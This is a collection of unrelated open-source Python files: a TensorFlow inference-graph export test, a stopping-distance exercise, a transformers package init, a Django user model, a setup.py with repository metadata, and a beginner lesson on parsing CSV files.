'detection_boxes': tf.constant([[0.0, 0.0, 0.5, 0.5],
[0.5, 0.5, 0.8, 0.8]], tf.float32),
'detection_scores': tf.constant([[0.7, 0.6]], tf.float32),
'detection_classes': tf.constant([[0, 1]], tf.float32),
'num_detections': tf.constant([2], tf.float32)
}
def restore_fn(self, checkpoint_path, from_detection_checkpoint):
pass
def loss(self, prediction_dict):
pass
class ExportInferenceGraphTest(tf.test.TestCase):
def _save_checkpoint_from_mock_model(self, checkpoint_path,
use_moving_averages):
g = tf.Graph()
with g.as_default():
mock_model = FakeModel(num_classes=1)
mock_model.preprocess(tf.constant([1, 3, 4, 3], tf.float32))
if use_moving_averages:
tf.train.ExponentialMovingAverage(0.0).apply()
saver = tf.train.Saver()
init = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init)
saver.save(sess, checkpoint_path)
def _load_inference_graph(self, inference_graph_path):
od_graph = tf.Graph()
with od_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(inference_graph_path) as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return od_graph
def _create_tf_example(self, image_array):
with self.test_session():
encoded_image = tf.image.encode_jpeg(tf.constant(image_array)).eval()
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
example = tf.train.Example(features=tf.train.Features(feature={
'image/encoded': _bytes_feature(encoded_image),
'image/format': _bytes_feature('jpg'),
'image/source_id': _bytes_feature('image_id')
})).SerializeToString()
return example
def test_export_graph_with_image_tensor_input(self):
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pbtxt')
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=None,
inference_graph_path=inference_graph_path)
def test_export_graph_with_tf_example_input(self):
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pbtxt')
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='tf_example',
pipeline_config=pipeline_config,
checkpoint_path=None,
inference_graph_path=inference_graph_path)
def test_export_frozen_graph(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=False)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
def test_export_frozen_graph_with_moving_averages(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=True)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = True
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
def test_export_and_run_inference_with_image_tensor(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=False)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='image_tensor',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
inference_graph = self._load_inference_graph(inference_graph_path)
with self.test_session(graph=inference_graph) as sess:
image_tensor = inference_graph.get_tensor_by_name('image_tensor:0')
boxes = inference_graph.get_tensor_by_name('detection_boxes:0')
scores = inference_graph.get_tensor_by_name('detection_scores:0')
classes = inference_graph.get_tensor_by_name('detection_classes:0')
num_detections = inference_graph.get_tensor_by_name('num_detections:0')
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: np.ones((1, 4, 4, 3)).astype(np.uint8)})
self.assertAllClose(boxes, [[0.0, 0.0, 0.5, 0.5],
[0.5, 0.5, 0.8, 0.8]])
self.assertAllClose(scores, [[0.7, 0.6]])
self.assertAllClose(classes, [[1, 2]])
self.assertAllClose(num_detections, [2])
def test_export_and_run_inference_with_tf_example(self):
checkpoint_path = os.path.join(self.get_temp_dir(), 'model-ckpt')
self._save_checkpoint_from_mock_model(checkpoint_path,
use_moving_averages=False)
inference_graph_path = os.path.join(self.get_temp_dir(),
'exported_graph.pb')
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel(num_classes=1)
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.eval_config.use_moving_averages = False
exporter.export_inference_graph(
input_type='tf_example',
pipeline_config=pipeline_config,
checkpoint_path=checkpoint_path,
inference_graph_path=inference_graph_path)
inference_graph = self._load_inference_graph(inference_graph_path)
with self.test_session(graph=inference_graph) as sess:
tf_example = inference_graph.get_tensor_by_name('tf_example:0')
boxes = inference_graph.get_tensor_by_name('detection_boxes:0')
scores = inference_graph.get_tensor_by_name('detection_scores:0')
classes = inference_graph.get_tensor_by_name('detection_classes:0')
num_detections = inference_graph.get_tensor_by_name('num_detections:0')
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={tf_example: self._create_tf_example(
np.ones((4, 4, 3)).astype(np.uint8))})
self.assertAllClose(boxes, [[0.0, 0.0, 0.5, 0.5],
[0.5, 0.5, 0.8, 0.8]])
self.assertAllClose(scores, [[0.7, 0.6]])
self.assertAllClose(classes, [[1, 2]])
self.assertAllClose(num_detections, [2])
if __name__ == '__main__':
tf.test.main()
# ---- ch_4/stopping_length.py (repo: ProhardONE/python_primer, license: MIT) ----
# Exercise 4.11
# Author: Noah Waterfield Price
import sys
g = 9.81 # acceleration due to gravity
try:
# initial velocity, given in km/h (convert to m/s)
v0 = (1000. / 3600) * float(sys.argv[1])
mu = float(sys.argv[2]) # coefficient of friction
except IndexError:
print 'Both v0 (in km/h) and mu must be supplied on the command line'
v0 = (1000. / 3600) * float(raw_input('v0 = ?\n'))
mu = float(raw_input('mu = ?\n'))
except ValueError:
print 'v0 and mu must be pure numbers'
sys.exit(1)
d = 0.5 * v0 ** 2 / mu / g
print d
"""
Sample run:
python stopping_length.py 120 0.3
188.771850342
python stopping_length.py 50 0.3
32.7728906843
"""
# ---- examples/DeepWisdom/Auto_NLP/deepWisdom/transformers_/__init__.py (repo: zichuan-scott-xu/automl-workflow, license: Apache-2.0) ----
__version__ = "2.1.1"
# Work around to update TensorFlow's absl.logging threshold which alters the
# default Python logging output behavior when present.
# see: https://github.com/abseil/abseil-py/issues/99
# and: https://github.com/tensorflow/tensorflow/issues/26691#issuecomment-500369493
try:
import absl.logging
absl.logging.set_verbosity('info')
absl.logging.set_stderrthreshold('info')
absl.logging._warn_preinit_stderr = False
except:
pass
import logging
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
# Files and general utilities
from .file_utils import (TRANSFORMERS_CACHE, PYTORCH_TRANSFORMERS_CACHE, PYTORCH_PRETRAINED_BERT_CACHE,
cached_path, add_start_docstrings, add_end_docstrings,
WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME, CONFIG_NAME,
is_tf_available, is_torch_available)
# Tokenizers
from .tokenization_utils import (PreTrainedTokenizer)
from .tokenization_auto import AutoTokenizer
from .tokenization_bert import BertTokenizer, BasicTokenizer, WordpieceTokenizer
from .tokenization_openai import OpenAIGPTTokenizer
from .tokenization_transfo_xl import (TransfoXLTokenizer, TransfoXLCorpus)
from .tokenization_gpt2 import GPT2Tokenizer
from .tokenization_ctrl import CTRLTokenizer
from .tokenization_xlnet import XLNetTokenizer, SPIECE_UNDERLINE
from .tokenization_xlm import XLMTokenizer
from .tokenization_roberta import RobertaTokenizer
from .tokenization_distilbert import DistilBertTokenizer
# Configurations
from .configuration_utils import PretrainedConfig
from .configuration_auto import AutoConfig
from .configuration_bert import BertConfig, BERT_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_openai import OpenAIGPTConfig, OPENAI_GPT_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_transfo_xl import TransfoXLConfig, TRANSFO_XL_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_gpt2 import GPT2Config, GPT2_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_ctrl import CTRLConfig, CTRL_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_xlnet import XLNetConfig, XLNET_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_xlm import XLMConfig, XLM_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_roberta import RobertaConfig, ROBERTA_PRETRAINED_CONFIG_ARCHIVE_MAP
from .configuration_distilbert import DistilBertConfig, DISTILBERT_PRETRAINED_CONFIG_ARCHIVE_MAP
# Modeling
if is_torch_available():
from .modeling_utils import (PreTrainedModel, prune_layer, Conv1D)
from .modeling_auto import (AutoModel, AutoModelForSequenceClassification, AutoModelForQuestionAnswering,
AutoModelWithLMHead)
from .modeling_bert import (BertPreTrainedModel, BertModel, BertForPreTraining,
BertForMaskedLM, BertForNextSentencePrediction,
BertForSequenceClassification, BertForMultipleChoice,
BertForTokenClassification, BertForQuestionAnswering,
load_tf_weights_in_bert, BERT_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_openai import (OpenAIGPTPreTrainedModel, OpenAIGPTModel,
OpenAIGPTLMHeadModel, OpenAIGPTDoubleHeadsModel,
load_tf_weights_in_openai_gpt, OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_transfo_xl import (TransfoXLPreTrainedModel, TransfoXLModel, TransfoXLLMHeadModel,
load_tf_weights_in_transfo_xl, TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_gpt2 import (GPT2PreTrainedModel, GPT2Model,
GPT2LMHeadModel, GPT2DoubleHeadsModel,
load_tf_weights_in_gpt2, GPT2_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_ctrl import (CTRLPreTrainedModel, CTRLModel,
CTRLLMHeadModel,
CTRL_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_xlnet import (XLNetPreTrainedModel, XLNetModel, XLNetLMHeadModel,
XLNetForSequenceClassification, XLNetForMultipleChoice,
XLNetForQuestionAnsweringSimple, XLNetForQuestionAnswering,
load_tf_weights_in_xlnet, XLNET_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_xlm import (XLMPreTrainedModel, XLMModel,
XLMWithLMHeadModel, XLMForSequenceClassification,
XLMForQuestionAnswering, XLMForQuestionAnsweringSimple,
XLM_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_roberta import (RobertaForMaskedLM, RobertaModel,
RobertaForSequenceClassification, RobertaForMultipleChoice,
ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_distilbert import (DistilBertForMaskedLM, DistilBertModel,
DistilBertForSequenceClassification, DistilBertForQuestionAnswering,
DISTILBERT_PRETRAINED_MODEL_ARCHIVE_MAP)
from .modeling_albert import AlbertForSequenceClassification
# Optimization
from .optimization import (AdamW, ConstantLRSchedule, WarmupConstantSchedule, WarmupCosineSchedule,
WarmupCosineWithHardRestartsSchedule, WarmupLinearSchedule)
if not is_tf_available() and not is_torch_available():
logger.warning("Neither PyTorch nor TensorFlow >= 2.0 have been found."
"Models won't be available and only tokenizers, configuration"
"and file/data utilities can be used.")
# ---- project/users/models.py (repo: rchdlps/django-docker, license: MIT) ----
from django.contrib.auth.models import AbstractUser
from django.db.models import CharField
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django.db import models
from PIL import Image
class User(AbstractUser):
# First Name and Last Name do not cover name patterns
# around the globe.
name = CharField(_('Nome de usuário:'), blank=True, max_length=255)
# Profile Models
image = models.ImageField(verbose_name='Foto de Perfil:',
default='default.jpg', upload_to='profile_pics')
birth_date = models.DateField(_('Data de Nascimento:'), null=True, blank=True)
cpf = models.CharField(_('CPF:'), max_length=50, blank=True)
cnpj = models.CharField(_('CNPJ:'), max_length=50, blank=True)
bio = models.TextField(_('Descrição:'), blank=True, default='')
cep = models.CharField(_('CEP:'), max_length=50, blank=True)
street = models.CharField(_('Rua:'), max_length=100, blank=True)
number_home = models.CharField(_('Número:'), max_length=10, blank=True)
neighborhood = models.CharField(_('Bairro:'), max_length=100, blank=True)
city = models.CharField(_('Cidade:'), max_length=50, blank=True)
state = models.CharField(_('Estado:'), max_length=50, blank=True)
phone = models.CharField(_('Telefone:'), max_length=50, blank=True)
cel_phone = models.CharField(_('Celular:'), max_length=50, blank=True)
def get_absolute_url(self):
return reverse("users:detail", kwargs={"username": self.username})
"""def save(self):
super().save()
img = Image.open(self.image.path)
if img.height > 300 or img.width > 300:
output_size = (300, 300)
img.thumbnail(output_size)
img.save(self.image.path)"""
22feb380588bd77256d844c8ff999d4f5568fa43 | 1,499 | py | Python | setup.py | ovnicraft/runa | 4834b7467314c51c3e8e010b47a10bdfae597a5b | [
"MIT"
] | 5 | 2018-02-02T13:12:55.000Z | 2019-12-21T04:21:10.000Z | setup.py | ovnicraft/runa | 4834b7467314c51c3e8e010b47a10bdfae597a5b | [
"MIT"
] | 1 | 2017-12-18T15:49:13.000Z | 2017-12-18T15:49:13.000Z | setup.py | ovnicraft/runa | 4834b7467314c51c3e8e010b47a10bdfae597a5b | [
"MIT"
] | 1 | 2020-03-17T03:50:19.000Z | 2020-03-17T03:50:19.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
requirements = ["Click>=6.0", "suds2==0.7.1"]
setup_requirements = [
# TODO(ovnicraft): put setup requirements (distutils extensions, etc.) here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name="runa",
version="0.2.10",
description="Librería para uso de WS del Bus Gubernamental de Ecuador",
long_description=readme + "\n\n" + history,
author="Cristian Salamea",
author_email="cristian.salamea@gmail.com",
url="https://github.com/ovnicraft/runa",
packages=find_packages(include=["runa"]),
entry_points={"console_scripts": ["runa=runa.cli:main"]},
include_package_data=True,
install_requires=requirements,
license="MIT license",
zip_safe=False,
keywords="runa webservices ecuador bgs",
classifiers=[
"Development Status :: 3 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
test_suite="tests",
tests_require=test_requirements,
setup_requires=setup_requirements,
)
| 28.826923 | 79 | 0.662442 | 177 | 1,499 | 5.491525 | 0.581921 | 0.052469 | 0.07716 | 0.080247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014913 | 0.194797 | 1,499 | 51 | 80 | 29.392157 | 0.790389 | 0.116745 | 0 | 0 | 0 | 0 | 0.384791 | 0.019772 | 0 | 0 | 0 | 0.019608 | 0 | 1 | 0 | false | 0 | 0.026316 | 0 | 0.026316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe02b43015e3d0762066c7be3eb1af3c04bff4d4 | 2,757 | py | Python | section_07_(files)/read_csv.py | govex/python-lessons | e692f48b6db008a45df0b941dee1e580f5a6c800 | [
"MIT"
] | 5 | 2019-10-25T20:47:22.000Z | 2021-12-07T06:37:22.000Z | section_07_(files)/read_csv.py | govex/python-lessons | e692f48b6db008a45df0b941dee1e580f5a6c800 | [
"MIT"
] | null | null | null | section_07_(files)/read_csv.py | govex/python-lessons | e692f48b6db008a45df0b941dee1e580f5a6c800 | [
"MIT"
] | 1 | 2021-07-20T18:56:15.000Z | 2021-07-20T18:56:15.000Z | # If you're new to file handling, be sure to check out with_open.py first!
# You'll also want to check out read_text.py before this example. This one is a bit more advanced.
with open('read_csv.csv', 'r') as states_file:
# Instead of leaving the file contents as a string, we're splitting the file into a list at every new line, and we save that list into the variable states
states = states_file.read().strip().split("\n")  # strip() avoids a trailing empty entry if the file ends with a newline
# Since this is a spreadsheet in comma separated values (CSV) format, we can think of states as a list of rows.
# But we'll need to split the columns into a list as well!
for index, state in enumerate(states):
states[index] = state.split(",")
# Now we have a nested list with all of the information!
# Our file looks like this:
# State, Population Estimate, Percent of Total population
# California, 38332521, 11.91%
# Texas, 26448193, 8.04%
# ...
# Our header row is at state[0], so we can use that to display the information in a prettier way.
for state in states[1:]: # We use [1:] so we skip the header row.
# state[0] is the first column in the row, which contains the name of the state.
print("\n---{0}---".format(state[0]))
for index, info in enumerate(state[1:]): # We use [1:] so we don't repeat the state name.
print("{0}:\t{1}".format(states[0][index+1], info))
# states is the full list of all of the states. It's a nested list. The outer list contains the rows, each inner list contains the columns in that row.
# states[0] refers to the header row of the list
# So states[0][0] would refer to "State", states[0][1] would refer to "Population Estimate", and states[0][2] would refer to "Percent of total population"
# state is one state within states. state is also a list, containing the name, population, and percentage of that particular state.
# So the first time through the loop, state[0] would refer to "California", state[1] would refer to 38332521, and state[2] would refer to 11.91%
# Since state is being created by the for loop above, it gets a new value each time through.
# We're using enumerate to get the index (position number) of the column we're on, along with the information.
# That way we can pair the column name with the information, as shown in the print call above.
# NOTE: Since we're slicing from [1:] in the inner loop, we need to increase the index by + 1, otherwise our headers will be off by one.
# Sample output (the code prints the raw values, without quotation marks):
# ---California---
# Population Estimate:	38332521
# Percent of Total population:	11.91%
# ---Texas---
# Population Estimate:	26448193
# Percent of Total population:	8.04%
# ---New York---
# Population Estimate:	19651127
# Percent of Total population:	6.19%
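Splitting on commas by hand breaks as soon as a field contains a quoted comma (e.g. a population written as "38,332,521"). Python's built-in csv module handles quoting for us. Here is a sketch of the same loop using csv.reader, with the sample data embedded as a string so it runs on its own:

```python
import csv
import io

# Same sample data as the file above, embedded so this sketch is self-contained.
sample = (
    "State,Population Estimate,Percent of Total population\n"
    "California,38332521,11.91%\n"
    "Texas,26448193,8.04%\n"
    "New York,19651127,6.19%\n"
)

reader = csv.reader(io.StringIO(sample))  # for a real file, pass an open file object
header = next(reader)  # the first row holds the column names
rows = []
for row in reader:
    rows.append(row)
    print("\n---{0}---".format(row[0]))
    # zip pairs each column name with its value, so no index arithmetic is needed
    for name, info in zip(header[1:], row[1:]):
        print("{0}:\t{1}".format(name, info))
```

The csv module also strips the quoting rules out of your code entirely, and csv.DictReader goes one step further by mapping each row to the header names for you.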